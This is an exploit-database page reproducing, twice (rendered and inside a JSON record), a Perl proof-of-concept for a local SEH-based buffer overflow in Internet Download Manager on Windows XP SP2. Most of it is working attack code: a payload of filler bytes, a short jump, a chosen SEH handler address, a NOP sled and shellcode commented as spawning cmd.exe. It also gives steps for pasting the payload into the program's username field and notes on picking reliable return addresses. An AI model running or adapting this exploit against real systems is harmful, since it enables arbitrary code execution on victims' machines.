Search...

Internet Download Manager All Versions - SEH Based Buffer Overflow

2014-07-01T00:00:00

ID SSV:75153
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #!/usr/bin/perl
# 1               ==========================================               1
# 0                   I&#39;m Dark-Puzzle From Inj3ct0r TEAM                   0
# 0                                                                        1
# 1                       dark-puzzle[at]live[at]fr                        0
# 0               ==========================================               1
# 1                              White Hat                                 1
# 0                         Independant Pentester                          0
# 1                      exploit coder/bug researcher                      0
# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
# Title  : Internet Download Manager All Versions-0day SEH Based Buffer Overflow+Universal.
# Author : Dark-Puzzle (Souhail Hammou)
# Type   : Local 
# Risk   : Critical
# Vendor : Tonec Inc.
# Versions : All versions of IDM are Vulnerable .
# Tested On : Windows XP Service Pack 2 FR 32-bits .
# Date : 14 September 2012
# Gr337ings to : Inj3ct0r Team - Packetstormsecurity.org - Securityfocus.com - Jigsaw - Dark-Soldier ...
# Working On : WinXp SP2 - &#34;Universal&#34; .

#Usage   : Copy this script to idman2.pl
#Execute : perl idman2.pl
#Go to the file bof.txt , Select ALL , then Copy .
# After copying the whole line Go To Downloads ---&#62; Options ----&#62; Dial up / VPN ----&#62; paste the line into the username field and let the password field blank then click Enter .
#French Version : Go to : Telechargement ---&#62; Options ---&#62; Internet ---&#62; then Copy The Whole line from bof.txt and paste it into the username field and let the password field blank then click Enter .

# BETTER COPY THE CONTENT OF THE FILE USING NOTEPAD++
# First Of all , This is a different exploit from (Internet Download Manager - Stack Based Overflow Vulnerability.)
# Second , Script Kiddies will be happy with my latest Idman Vulnerabilities but don&#39;t bother, you may face some problems with the shellcode in this exploit So choose wisely the badchars .

my $junk = &#34;A&#34; x 2301 ;
my $nseh = &#34;\xeb\x32\x90\x90&#34;;
#look down for Universal address# 0x74ca4cdb OS address (WinXP SP2 Only with oledlg.dll)
my $seh = &#34;\xdb\x4c\xca\x74&#34; ;# For the Universal address details look below .
my $nops = &#34;\x90&#34; x 44 ; 
my $shellcode = 
&#34;\x8B\xEC\x33\xFF\x57&#34;.
&#34;\xC6\x45\xFC\x63\xC6\x45&#34;.
&#34;\xFD\x6D\xC6\x45\xFE\x64&#34;.
&#34;\xC6\x45\xF8\x01\x8D&#34;.
&#34;\x45\xFC\x50\xB8\xC7\x93&#34;.
&#34;\xBF\x77\xFF\xD0&#34;; # CMD.EXE Shellcode (After passing Automaticaly or with a debugger the exception to the handler we will be able to jmp to our shellcode after some nops .)
my $junkk = &#34;\x90&#34; x 9000; # Not Actually Junk ,This is what makes this exploit work =) So be careful .
$payload= $junk.$nseh.$seh.$nops.$shellcode.$junkk;
open(myfile,&#39;&#62;bofme.txt&#39;);
print myfile $payload;
close(myfile);
print &#34;\x44\x69\x73\x63\x6f\x76\x65\x72\x65\x64\x20\x26\x20\x57\x72\x69\x74\x74\x65\x6e\x20\x42\x79\x20\x44\x61\x72\x6b\x2d\x50\x75\x7a\x7a\x6c\x65\n\n&#34;;
print &#34;Creating Evil File Please Be Patient\n\n&#34;;
sleep (4);
print &#34; &#34;.length($payload).&#34; bytes has been written\n\n&#34;;
print &#34;File bofme.txt Created Successfuly .\n\n&#34;;
print &#34;Now Copy its content to Username field in IDMan DialUp options\n\n&#34;;

##########Universal Address##############
# I worked on finding a universal address and that&#39;s what I found .
# First you may find some pop r/pop r2/ret / call dword ptr SS:[R+30] addresses in idman.exe Module .
# but The problem here is that all the addr in this module look like this : 0x00ffffff
# So it will terminate the string and the vulnerability will not be executed .
# Ok, the second problem is in idmmkb.dll we found an address &#34;rebase&#34; . As I analysed I found that the rebase goes between &#34;a&#34; and &#34;b&#34; in the address base
# And the Top always stays the same . It will give us in this case two Possibilities 50% of each address to be the correct one in every program execution .
# So All to do here is to try these two addresses manually or using a program .
# The First one :  0x017A1B13
# The Second one : 0x017B1B13
# All you have to do is replace one of these in the &#34;pointer to the next SE Handler&#34; .
########################################

#Datasec Team .

JSON Vulners Source

Initial Source

{"lastseen": "2017-11-19T15:43:34", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "poc", "enchantments": {"score": {"value": 0.7, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.7}, "href": "https://www.seebug.org/vuldb/ssvid-75153", "references": [], "enchantments_done": [], "id": "SSV:75153", "title": "Internet Download Manager All Versions - SEH Based Buffer Overflow", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 1, "sourceData": "\n #!/usr/bin/perl\r\n# 1 ========================================== 1\r\n# 0 I'm Dark-Puzzle From Inj3ct0r TEAM 0\r\n# 0 1\r\n# 1 dark-puzzle[at]live[at]fr 0\r\n# 0 ========================================== 1\r\n# 1 White Hat 1\r\n# 0 Independant Pentester 0\r\n# 1 exploit coder/bug researcher 0\r\n# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1\r\n# Title : Internet Download Manager All Versions-0day SEH Based Buffer Overflow+Universal.\r\n# Author : Dark-Puzzle (Souhail Hammou)\r\n# Type : Local \r\n# Risk : Critical\r\n# Vendor : Tonec Inc.\r\n# Versions : All versions of IDM are Vulnerable .\r\n# Tested On : Windows XP Service Pack 2 FR 32-bits .\r\n# Date : 14 September 2012\r\n# Gr337ings to : Inj3ct0r Team - Packetstormsecurity.org - Securityfocus.com - Jigsaw - Dark-Soldier ...\r\n# Working On : WinXp SP2 - "Universal" .\r\n\r\n#Usage : Copy this script to idman2.pl\r\n#Execute : perl idman2.pl\r\n#Go to the file bof.txt , Select ALL , then Copy .\r\n# After copying the whole line Go To Downloads ---> Options ----> Dial up / VPN ----> paste the line into the username field and let the password field blank then click Enter .\r\n#French Version : Go to : Telechargement ---> Options ---> Internet ---> then Copy The Whole line from bof.txt and paste it into the username field and let the password field blank then click Enter .\r\n\r\n# BETTER COPY THE CONTENT OF THE FILE USING NOTEPAD++\r\n# First Of all , This is a different exploit from (Internet Download Manager - Stack Based Overflow Vulnerability.)\r\n# Second , Script Kiddies will be happy with my latest Idman Vulnerabilities but don't bother, you may face some problems with the shellcode in this exploit So choose wisely the badchars .\r\n\r\nmy $junk = "A" x 2301 ;\r\nmy $nseh = "\\xeb\\x32\\x90\\x90";\r\n#look down for Universal address# 0x74ca4cdb OS address (WinXP SP2 Only with oledlg.dll)\r\nmy $seh = "\\xdb\\x4c\\xca\\x74" ;# For the Universal address details look below .\r\nmy $nops = "\\x90" x 44 ; \r\nmy $shellcode = \r\n"\\x8B\\xEC\\x33\\xFF\\x57".\r\n"\\xC6\\x45\\xFC\\x63\\xC6\\x45".\r\n"\\xFD\\x6D\\xC6\\x45\\xFE\\x64".\r\n"\\xC6\\x45\\xF8\\x01\\x8D".\r\n"\\x45\\xFC\\x50\\xB8\\xC7\\x93".\r\n"\\xBF\\x77\\xFF\\xD0"; # CMD.EXE Shellcode (After passing Automaticaly or with a debugger the exception to the handler we will be able to jmp to our shellcode after some nops .)\r\nmy $junkk = "\\x90" x 9000; # Not Actually Junk ,This is what makes this exploit work =) So be careful .\r\n$payload= $junk.$nseh.$seh.$nops.$shellcode.$junkk;\r\nopen(myfile,'>bofme.txt');\r\nprint myfile $payload;\r\nclose(myfile);\r\nprint "\\x44\\x69\\x73\\x63\\x6f\\x76\\x65\\x72\\x65\\x64\\x20\\x26\\x20\\x57\\x72\\x69\\x74\\x74\\x65\\x6e\\x20\\x42\\x79\\x20\\x44\\x61\\x72\\x6b\\x2d\\x50\\x75\\x7a\\x7a\\x6c\\x65\\n\\n";\r\nprint "Creating Evil File Please Be Patient\\n\\n";\r\nsleep (4);\r\nprint " ".length($payload)." bytes has been written\\n\\n";\r\nprint "File bofme.txt Created Successfuly .\\n\\n";\r\nprint "Now Copy its content to Username field in IDMan DialUp options\\n\\n";\r\n\r\n##########Universal Address##############\r\n# I worked on finding a universal address and that's what I found .\r\n# First you may find some pop r/pop r2/ret / call dword ptr SS:[R+30] addresses in idman.exe Module .\r\n# but The problem here is that all the addr in this module look like this : 0x00ffffff\r\n# So it will terminate the string and the vulnerability will not be executed .\r\n# Ok, the second problem is in idmmkb.dll we found an address "rebase" . As I analysed I found that the rebase goes between "a" and "b" in the address base\r\n# And the Top always stays the same . It will give us in this case two Possibilities 50% of each address to be the correct one in every program execution .\r\n# So All to do here is to try these two addresses manually or using a program .\r\n# The First one : 0x017A1B13\r\n# The Second one : 0x017B1B13\r\n# All you have to do is replace one of these in the "pointer to the next SE Handler" .\r\n########################################\r\n\r\n#Datasec Team .\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-75153", "type": "seebug", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645277905}}